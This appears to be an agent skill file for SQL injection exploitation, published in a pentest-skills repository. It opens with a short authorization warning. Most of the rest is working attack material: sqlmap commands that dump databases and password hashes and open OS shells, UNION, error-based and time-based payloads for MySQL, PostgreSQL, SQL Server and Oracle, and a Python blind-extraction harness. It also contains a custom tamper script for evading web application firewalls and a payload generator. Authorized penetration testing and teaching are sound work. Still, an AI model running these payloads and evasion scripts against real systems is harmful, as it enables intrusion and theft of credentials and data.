exploit-sqli

Stars: 215

SQL injection detection and exploitation using sqlmap, manual techniques, and custom payloads. Use this skill when the user needs to test for SQL injection vulnerabilities, extract database information, or exploit SQLi in parameters, headers, or cookies.

By crazyMarky. Updated 6/4/2026


SQL Injection Detection & Exploitation

Authorization Warning

DANGER: SQL injection testing can damage or destroy data in production databases. Always ensure you have:

  • Written permission from the target application owner
  • Isolated testing environment
  • Backups of affected systems
  • Legal compliance with local regulations

Never test SQL injection on production databases without authorization.

Prerequisites

Required tools that must be installed on your system:

  • sqlmap - pip install sqlmap or git clone https://github.com/sqlmapproject/sqlmap

Optional tools:

  • BBQSQL - Semi-automated SQL injection tool
  • NoSQLMap - NoSQL injection testing

Quick Start

Most commonly used commands for SQL injection testing:

Automated SQLMap Scan

sqlmap -u "https://target.com/page?id=1"

POST Request Testing

sqlmap -u "https://target.com/login" --data="username=admin&password=test"

Cookie Testing

sqlmap -u "https://target.com" --cookie="sessionid=abc123" --level=2

Common Scenarios

Scenario 1: Basic Parameter Testing

When you need to test a URL parameter for SQL injection:

sqlmap -u "https://target.com/page?id=1"

Parameters:

  • -u - Target URL
  • -p - Specific parameter to test (default: all)
  • --batch - Avoid interactive prompts
  • --random-agent - Use random User-Agent

Example:

sqlmap -u "https://target.com/vuln.php?id=1" --batch --random-agent

Scenario 2: POST Request Injection

When you need to test POST body parameters:

sqlmap -u "https://target.com/login" --data="username=admin&password=test"

From a captured request (for example one saved from Burp or ZAP), which also carries the cookies and headers the application expects (-r loads a raw HTTP request; -d is sqlmap's direct database connection option, not a data file):

sqlmap -r login_request.txt -p username

Scenario 3: Cookie/Header Injection

When you need to test cookies or headers:

# Cookie injection (cookie values are only tested at --level 2 or higher)
sqlmap -u "https://target.com" --cookie="sessionid=abc123" --level=2

# User-Agent injection (User-Agent and Referer are only tested at --level 3 or higher)
sqlmap -u "https://target.com" --user-agent="Mozilla/5.0" --level=3

# Referer injection
sqlmap -u "https://target.com" --referer="https://evil.com" --level=3

# Any other header: mark the injection point explicitly with *
sqlmap -u "https://target.com" --headers="X-Forwarded-For: 127.0.0.1*"

Multiple headers (separate them with \n; -H takes a single header):

sqlmap -u "https://target.com" --cookie="id=1" --headers="X-Forwarded-For: 127.0.0.1*\nUser-Agent: test"

Scenario 4: Specific DBMS Testing

When you know or suspect the database type:

sqlmap -u "https://target.com/page?id=1" --dbms=mysql
sqlmap -u "https://target.com/page?id=1" --dbms=postgresql
sqlmap -u "https://target.com/page?id=1" --dbms=mssql
sqlmap -u "https://target.com/page?id=1" --dbms=oracle

Scenario 5: Database Enumeration

When you need to extract database information:

# List databases
sqlmap -u "https://target.com/page?id=1" --dbs

# List tables
sqlmap -u "https://target.com/page?id=1" -D dbname --tables

# Dump table
sqlmap -u "https://target.com/page?id=1" -D dbname -T users --dump

# Dump all
sqlmap -u "https://target.com/page?id=1" --dump-all

Scenario 6: User Enumeration

When you need to extract user credentials:

# Enumerate database users
sqlmap -u "https://target.com/page?id=1" --users

# Extract password hashes
sqlmap -u "https://target.com/page?id=1" --passwords

# Dump users table
sqlmap -u "https://target.com/page?id=1" -D dbname -T users -C username,password --dump

Scenario 7: Union-Based SQL Injection

Manual testing for Union-based SQLi:

# Probe first, then inject a UNION once the column count is known
https://target.com/page?id=1' OR '1'='1
https://target.com/page?id=1' UNION SELECT 1,2,3--
https://target.com/page?id=1' UNION SELECT NULL,version(),NULL--
# MySQL only treats "--" as a comment when whitespace follows it; in a URL use "--+" or "-- -" (or "#") so the trailing space is not dropped

Determine column count:

id=1' ORDER BY 1--
id=1' ORDER BY 2--
id=1' ORDER BY 3--

Check for string vs integer:

id=1' UNION SELECT 1,'2',3--
id=1' UNION SELECT 1,NULL,NULL--

Scenario 8: Error-Based SQL Injection

When error messages are displayed:

# MySQL error injection (the result is returned inside the error text between the ~ markers)
id=1' AND extractvalue(1, concat(0x7e, database(), 0x7e))--
id=1' AND updatexml(1, concat(0x7e, database(), 0x7e), 1)--
# DOUBLE overflow variant: version-dependent, extractvalue/updatexml are the reliable choice
id=1' AND exp(~(SELECT * FROM (SELECT database())a))--

# PostgreSQL error injection (the cast fails and the error message quotes the value being cast)
id=1' AND 1=cast(version() as int)--
id=1'; SELECT cast(version() AS int)--

Scenario 9: Blind SQL Injection

When no error messages are returned:

Boolean-based:

id=1' AND 1=1--
id=1' AND 1=2--

Time-based (MySQL):

id=1' AND SLEEP(5)--
id=1' AND BENCHMARK(5000000, MD5(1))--

Time-based (PostgreSQL; the first form needs stacked queries, the second does not):

id=1'; SELECT pg_sleep(5)--
id=1' AND 1=(SELECT 1 FROM pg_sleep(5))--
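Scenarios 7 and 9 show what the individual requests look like but not the loop a tester (or sqlmap) runs around them. The following is an added example, not code from this skill or from sqlmap: it builds a constructed, deliberately vulnerable lookup over an in-memory SQLite database and drives the ORDER BY column count, UNION extraction and boolean-based blind extraction against it, then shows the parameterized query that closes the hole. SQLite's unicode()/substr()/length() stand in for ascii()/substring() on MySQL and PostgreSQL, and stacked queries are not shown because Python's sqlite3 execute() refuses more than one statement. The table names, sample rows and request counter are assumptions.

```python
import sqlite3

# Constructed sample schema: a products lookup plus a users table worth stealing.
_DB = sqlite3.connect(":memory:")
_DB.executescript("""
    CREATE TABLE products(id INTEGER, name TEXT, price REAL);
    INSERT INTO products VALUES (1, 'Widget', 9.99), (2, 'Gadget', 19.50);
    CREATE TABLE users(username TEXT, password TEXT);
    INSERT INTO users VALUES ('admin', 's3cret');
""")
REQUESTS = {"count": 0}   # how many "HTTP requests" a technique costs


def vulnerable_page(id_param):
    """The 'before' code: the parameter is concatenated into a quoted string.
    Returns (rows, error_text) like an application that echoes database errors."""
    REQUESTS["count"] += 1
    sql = "SELECT id, name, price FROM products WHERE id = '%s'" % id_param
    try:
        return _DB.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        return [], str(exc)


def safe_page(id_param):
    """The fix: a bound parameter is data, never SQL."""
    sql = "SELECT id, name, price FROM products WHERE id = ?"
    return _DB.execute(sql, (id_param,)).fetchall()


def find_column_count(max_cols=20):
    """Scenario 7: raise ORDER BY n until the database complains."""
    for n in range(1, max_cols + 1):
        _, err = vulnerable_page("1' ORDER BY %d--" % n)
        if err:                        # "1st ORDER BY term out of range ..."
            return n - 1
    return None


def find_reflected_column(ncols):
    """Inject a distinct marker into every column and see which one is rendered."""
    markers = ["'col%d'" % i for i in range(ncols)]
    rows, _ = vulnerable_page("0' UNION SELECT %s--" % ",".join(markers))
    for row in rows:
        for i, cell in enumerate(row):
            if cell == "col%d" % i:
                return i
    return None


def union_extract(expr, table, ncols, position):
    """Scenario 7: pad with NULLs so column count and types line up, then read
    `expr` through the reflected column. id=0 matches nothing, so only the
    UNIONed rows come back."""
    cols = ["NULL"] * ncols
    cols[position] = expr
    rows, err = vulnerable_page("0' UNION SELECT %s FROM %s--" % (",".join(cols), table))
    if err:
        raise RuntimeError(err)
    return [row[position] for row in rows]


def oracle(condition):
    """Scenario 9: boolean-based blind. The id=1 row is shown only when the
    injected condition is true; no error text is needed."""
    rows, _ = vulnerable_page("1' AND (%s)--" % condition)
    return bool(rows)


def blind_extract(subquery, max_len=64):
    """Recover a string one character at a time by binary search over the
    printable ASCII range: about 7 requests per character instead of 95."""
    length = next((n for n in range(1, max_len + 1)
                   if oracle("length((%s)) = %d" % (subquery, n))), None)
    if length is None:
        return None
    out = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("unicode(substr((%s), %d, 1)) > %d" % (subquery, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    n = find_column_count()
    col = find_reflected_column(n)
    print("columns:", n, "reflected column:", col)
    print("union:", union_extract("username || ':' || password", "users", n, col))
    REQUESTS["count"] = 0
    secret = blind_extract("SELECT password FROM users WHERE username = 'admin'")
    print("blind:", secret, "in", REQUESTS["count"], "requests")
    print("parameterized query with the same payload:", safe_page("1' OR '1'='1"))
```

The request counter is the point of the blind section: the same six-character value costs a handful of requests through UNION and around fifty through the boolean oracle, which is why sqlmap prefers UNION and error-based techniques when they are available and falls back to blind ones.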

Scenario 10: WAF Evasion

When WAF blocks injection attempts:

# Use tamper scripts (see tamper/ in the sqlmap tree; chain several with commas)
sqlmap -u "https://target.com/page?id=1" --tamper=space2comment,randomcase

# Use random agent
sqlmap -u "https://target.com/page?id=1" --random-agent

# Raise level and risk (defaults are 1/1) so more payloads and injection points are tried
sqlmap -u "https://target.com/page?id=1" --level=5 --risk=3

# Specific technique
sqlmap -u "https://target.com/page?id=1" --technique=U
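When none of the shipped tamper scripts fits, a custom one is a plain Python module placed in sqlmap's tamper/ directory that exposes a tamper(payload, **kwargs) function. The module below is an added example, not one of sqlmap's own scripts: it combines the effect of space2comment and randomcase, swapping whitespace outside quoted literals for /**/ and alternating keyword case deterministically so the output is reproducible. The keyword list, the file name space2comment_altcase and the guarded import of sqlmap's PRIORITY enum (so the file also runs stand-alone) are assumptions; SQL keywords are case-insensitive on the DBMS families covered by this skill, so the case change never alters query semantics.

```python
"""
space2comment_altcase.py: custom sqlmap tamper script (added example).

Replaces whitespace outside quoted string literals with /**/ and alternates
the letter case of SQL keywords, e.g.  1' AND 1=1  ->  1'/**/AnD/**/1=1
Save it under sqlmap's tamper/ directory and select it with
--tamper=space2comment_altcase
"""
try:
    from lib.core.enums import PRIORITY      # present when sqlmap loads the module
    __priority__ = PRIORITY.NORMAL
except ImportError:                          # stand-alone run outside sqlmap
    pass

# Assumed keyword list: extend it as needed; words not in it keep their case.
KEYWORDS = {"AND", "OR", "NOT", "UNION", "SELECT", "FROM", "WHERE", "ORDER",
            "BY", "NULL", "LIKE", "IN", "SLEEP", "BENCHMARK", "CONCAT"}


def dependencies():
    """Called by sqlmap at load time; nothing extra is required here."""
    pass


def _altcase(word):
    """Deterministic case alternation: UNION -> UnIoN."""
    return "".join(c.lower() if i % 2 else c.upper() for i, c in enumerate(word))


def tamper(payload, **kwargs):
    """Entry point sqlmap calls with each payload string."""
    if not payload:
        return payload
    out, word = [], []
    in_squote = in_dquote = seen_space = False

    def flush():
        # Emit the pending word, case-mangled only if it is a keyword outside quotes.
        if word:
            w = "".join(word)
            quoted = in_squote or in_dquote
            out.append(_altcase(w) if w.upper() in KEYWORDS and not quoted else w)
            word.clear()

    for ch in payload:
        if ch.isalpha() or ch == "_":
            word.append(ch)
            continue
        flush()
        if ch.isspace() and not (in_squote or in_dquote):
            out.append("/**/")
            seen_space = True
            continue
        # As in sqlmap's own space2comment, quote tracking starts after the first
        # space so the unbalanced boundary quote in "1' AND ..." is not misread.
        if seen_space and ch == "'" and not in_dquote:
            in_squote = not in_squote
        elif seen_space and ch == '"' and not in_squote:
            in_dquote = not in_dquote
        out.append(ch)
    flush()
    return "".join(out)


if __name__ == "__main__":
    for p in ("1' AND 1=1 AND 'abc'='abc", "' UNION SELECT NULL,'a b',NULL"):
        print(p, "->", tamper(p))
```

Run it stand-alone first to see what each payload becomes; once the transformation looks right, sqlmap picks it up with --tamper=space2comment_altcase and -v 3 or higher shows the tampered payloads actually sent.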

Injection Testing Workflow

1. Initial Detection

# Automated scan
sqlmap -u "https://target.com/page?id=1" --batch

# Manual quick test: break the quoting and look for database error strings
# (-G with --data-urlencode keeps the quotes and spaces in the payload intact)
curl -sG "https://target.com/page" --data-urlencode "id=1'" | grep -i "sql\|mysql\|syntax\|odbc\|ora-"
curl -sG "https://target.com/page" --data-urlencode "id=1\" OR \"1\"=\"2" | grep -i "error"

2. Confirmation

# Confirm with paired payloads: the true and false variants should return different pages
curl -sG "https://target.com/page" --data-urlencode "id=1 AND 1=1" | md5sum
curl -sG "https://target.com/page" --data-urlencode "id=1 AND 1=2" | md5sum
curl -sG "https://target.com/page" --data-urlencode "id=1' OR '1'='1"

3. Fingerprint Database

sqlmap -u "https://target.com/page?id=1" -f --banner --current-user

4. Enumeration

# Get database info
sqlmap -u "https://target.com/page?id=1" --hostname --current-db --is-dba

# List databases
sqlmap -u "https://target.com/page?id=1" --dbs

SQLMap Options Reference

Option Description
-u Target URL
-r Load HTTP request from a file
-l Parse targets from a Burp or WebScarab proxy log file
-m Scan multiple targets
-p Test specific parameters
--skip Skip parameters
--dbms Force DBMS
--os Force OS
--tamper Tamper script
--level Test level (1-5)
--risk Risk level (1-3)
--technique Specific technique (B/E/U/S/T)
--batch Non-interactive
--random-agent Random User-Agent
--proxy Use proxy
--delay Delay between requests
--timeout Request timeout
--retries Retry attempts
--string Match string
--not-string Not match string
--regexp Regexp filter
--code HTTP status code to match when the query evaluates to true
--crawl Crawl site
--forms Parse forms
--cookie Cookie value
--headers Extra headers
--user-agent Custom User-Agent
--method Force method
--data POST data
-d Direct database connection string (e.g. "mysql://user:pass@host:3306/db")
--dbs Enumerate databases
--tables Enumerate tables
--columns Enumerate columns
--schema Enumerate schema
--dump Dump data
--dump-all Dump all
--search Search
--users Enumerate DB users
--passwords Enumerate password hashes
--priv-esc Privilege escalation
--os-shell OS shell
--os-pwn Out-of-band shell, Meterpreter or VNC
--sql-shell SQL shell
--wizard Wizard mode
-v Verbosity (0-6)

Manual Payloads

MySQL Payloads

-- Version detection
' UNION SELECT @@version--

-- Current user
' UNION SELECT user()--

-- Current database
' UNION SELECT database()--

-- All databases
' UNION SELECT schema_name FROM information_schema.schemata--

-- Tables from database
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database()--

-- Columns from table
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--

-- Concatenate data
' UNION SELECT CONCAT(username,0x3a,password) FROM users--

PostgreSQL Payloads

-- Version
' UNION SELECT version()--

-- Current user
' UNION SELECT user--

-- Current database
' UNION SELECT current_database()--

-- All databases
' UNION SELECT datname FROM pg_database--

-- Tables
' UNION SELECT tablename FROM pg_tables WHERE schemaname='public'--

-- Columns
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--

SQL Server Payloads

-- Version
' UNION SELECT @@version--

-- Database
' UNION SELECT DB_NAME()--

-- Tables
' UNION SELECT table_name FROM information_schema.tables--

-- Columns
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--

-- Databases
' UNION SELECT name FROM master..sysdatabases--

Oracle Payloads

-- Version
' UNION SELECT banner FROM v$version--

-- Tables
' UNION SELECT table_name FROM all_tables WHERE owner=USER--

-- Columns
' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'--
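The four payload lists above differ in more than function names: Oracle will not accept a SELECT without a FROM clause, MySQL only honours -- as a comment when whitespace follows it, and every UNION has to match the column count found with ORDER BY. The generator below is an added example, not part of the skill, that encodes those rules so a version payload can be built for any of the four engines once the column count and the reflected column are known; the dbms keys, the "-- -" terminator choice and the function names are assumptions.

```python
# Comment terminators: MySQL only treats "--" as a comment when whitespace
# follows, and URL handling often strips a trailing space, so "-- -" is used.
COMMENT = {"mysql": "-- -", "postgresql": "--", "mssql": "--", "oracle": "--"}

# (expression, source table) returning the server version on each engine,
# taken from the payload lists above. None means no FROM clause is needed.
VERSION = {
    "mysql": ("@@version", None),
    "postgresql": ("version()", None),
    "mssql": ("@@version", None),
    "oracle": ("banner", "v$version"),
}


def order_by_probes(max_cols=10, prefix="'", dbms="mysql"):
    """Scenario 7 probe sequence: the first n that errors is one past the real count."""
    return ["%s ORDER BY %d%s" % (prefix, n, COMMENT[dbms]) for n in range(1, max_cols + 1)]


def union_payload(dbms, ncols, expr, position, table=None, prefix="'"):
    """UNION SELECT with `expr` at `position` (0-based) and NULL everywhere else.
    NULL is accepted in a column of any type, so it doubles as the type probe."""
    dbms = dbms.lower()
    if dbms not in COMMENT:
        raise ValueError("unsupported dbms: %s" % dbms)
    if not 0 <= position < ncols:
        raise ValueError("position must be within 0..%d" % (ncols - 1))
    cols = ["NULL"] * ncols
    cols[position] = expr
    source = table
    if source is None and dbms == "oracle":
        source = "dual"            # Oracle rejects a SELECT without FROM
    query = "UNION SELECT " + ",".join(cols)
    if source:
        query += " FROM " + source
    return "%s %s%s" % (prefix, query, COMMENT[dbms])


def version_payload(dbms, ncols, position):
    """Version-disclosure payload for the given engine, column count and reflected column."""
    expr, table = VERSION[dbms.lower()]
    return union_payload(dbms, ncols, expr, position, table)


if __name__ == "__main__":
    for dbms in COMMENT:
        print(dbms.ljust(10), version_payload(dbms, 3, 1))
```

The same function produces the enumeration payloads from the lists above by passing the table-listing expression and its source table (for example column_name from information_schema.columns), which is usually faster than retyping them with the right amount of NULL padding for each target.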

Testing Checklist

  • URL parameters
  • POST parameters
  • Cookies
  • User-Agent
  • Referer
  • X-Forwarded-For
  • Accept headers
  • JSON body fields
  • GraphQL queries
  • API endpoints

Scenario: Persistent Storage of SQL Injection Findings

When you need to persist SQL injection findings to the local results database (./data/results.db):

# Manual entry after discovering SQL injection
python .claude/skills/exploit-sqli/scripts/sqli_storage.py \
  --host-ip 192.168.1.100 \
  --url "https://example.com/login?id=1" \
  --parameter id \
  --payload "1' OR '1'='1" \
  --severity Critical \
  --cvss-score 9.8 \
  --db-type MySQL \
  --subsystem "Web Application"

Parameters:

  • --host-ip - Target host IP (required)
  • --url - Vulnerable URL (required)
  • --parameter - Vulnerable parameter name (required)
  • --payload - Payload used (required)
  • --severity - Severity level (default: High)
  • --cvss-score - CVSS score (0.0-10.0)
  • --db-type - Database type (e.g., MySQL, PostgreSQL)
  • --subsystem - Subsystem name (optional)
  • --title - Vulnerability title (auto-generated if not specified)
  • --description - Vulnerability description

Database location: ./data/results.db

Related skills: results-storage - Query data, generate reports


Resources

Scripts

  • scripts/sqli_payload_generator.py - Generate SQL injection payloads
  • scripts/boolean_sqli_tester.py - Test blind SQL injection
  • scripts/response_analyzer.py - Analyze responses for injection clues

References

  • references/sqlmap_guide.md - Comprehensive SQLMap reference
  • references/manual_sqli_techniques.md - Manual injection techniques
  • references/nosql_injection.md - NoSQL injection guide

Assets

  • assets/common_error_payloads.txt - Common error-based payloads
  • assets/time-based_payloads.txt - Time-based blind payloads
  • assets/dbms_fingerprints.txt - Database fingerprinting patterns

Install via CLI

npx skills add https://github.com/crazyMarky/pentest-skills --skill exploit-sqli

Repository Details

Forks: 26
Branch: main
Path: SKILL.md